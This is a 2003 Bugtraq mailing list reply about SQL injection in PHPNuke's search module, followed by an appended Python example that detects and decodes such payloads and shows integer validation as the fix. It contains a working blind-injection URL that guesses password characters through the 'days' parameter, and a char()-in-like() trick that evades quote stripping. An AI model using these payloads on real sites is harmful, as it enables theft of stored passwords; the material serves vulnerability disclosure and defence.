Bugtraq mailing list archives
Re: PHPNuke SQL Injection
From: Martin Eiszner <martin () websec org>
Date: Fri, 21 Feb 2003 08:11:18 +0100
hola,

On 20 Feb 2003 20:36:11 -0000 Lucas Armstrong <lucas () cgishield com> wrote:

To get around this problem, one could use the MySQL char() function which will output any ASCII value, without using quotes. So to guess the letter 'a' the hacker could use char(97). Here is an example URL guessing the 3rd character in the pwd column as 'a':
http://site/modules.php?name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=char(97)&type=stories
JFYI: this may be off topic but it is worth mentioning. A couple of months ago we found out that the MySQL char() function can be used within the like() function to place quotes. This may help somebody doing SQL injection in a "quote-stripped :-)" environment.

example query:

---*---
select id,Name,password from Users where id = 1 and (user() like "%root%");
---*---

and now "without" quotes:

---*---
select id,Name,password from Users where id = 1 and (user() like char(37,114,111,111,116,37));
---*---

...

nice day,
mEi

--
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei () websec org
http://www.websec.org
tel: 0043 699 121772 37
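The char() trick from the two posts above, seen from the defender's side, as an added Python example that is not part of this thread: it shows that stripping quote characters leaves such a payload untouched, decodes char(...) calls back into the strings they spell out so an analyst can see what was being guessed, flags the query parameter they arrived in, and shows the integer-only check that closes the hole for a numeric parameter like days. The request lines and the parse_days function are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample request lines (not taken from the thread), modelled on the quoted URL and like/char() query.
SAMPLE_REQUESTS = [
    "GET /modules.php?name=search&query=&topic=&category=&author="
    "&days=1+or+mid(a.pwd,3,1)=char(97)&type=stories",
    "GET /modules.php?name=search&query=php&days=7&type=stories",
    "GET /modules.php?name=search&days=1+and+(user()+like+char(37,114,111,111,116,37))",
]

# char(<n>, <n>, ...) with optional whitespace, as MySQL accepts it
CHAR_CALL = re.compile(r"char\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.IGNORECASE)
# a condition spliced onto a numeric parameter: "<number> or|and ..."
SPLICED_CONDITION = re.compile(r"^\d+\s+(?:or|and)\s+", re.IGNORECASE)

def strip_quotes(value):
    """The kind of 'sanitiser' the thread talks about: it removes quote
    characters and nothing else, so a char()-based payload passes through."""
    return value.replace("'", "").replace('"', "")

def decode_char_calls(text):
    """Turn every char(...) call back into the string the attacker spelled out."""
    return ["".join(chr(int(n)) for n in m.group(1).split(","))
            for m in CHAR_CALL.finditer(text)]

def triage(request_line):
    """Inspect one request line and return one finding per suspicious query
    parameter: (name, decoded value, strings spelled out with char())."""
    path = request_line.split(" ", 2)[1]
    findings = []
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        if SPLICED_CONDITION.search(value) or CHAR_CALL.search(value):
            findings.append((name, value, decode_char_calls(value)))
    return findings

def parse_days(value):
    """The actual fix for a numeric parameter such as days: accept only a bare
    integer, so there is no SQL context left for char() or anything else."""
    if not value.isdigit():
        raise ValueError(f"days must be an integer, got {value!r}")
    return int(value)

if __name__ == "__main__":
    payload = "1 or mid(a.pwd,3,1)=char(97)"
    assert strip_quotes(payload) == payload  # nothing to strip
    for line in SAMPLE_REQUESTS:
        for name, value, decoded in triage(line):
            print(f"{name}={value!r} spells out {decoded}")
```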
Current thread:
- PHPNuke SQL Injection Lucas Armstrong (Feb 20)
- Re: PHPNuke SQL Injection Martin Eiszner (Feb 21)
- Re: PHPNuke SQL Injection / General SQL Injection David Walker (Feb 21)
- Re: PHPNuke SQL Injection / General SQL Injection MightyE (Feb 23)
- <Possible follow-ups>
- RE: PHPNuke SQL Injection Oriol Carreas (Feb 21)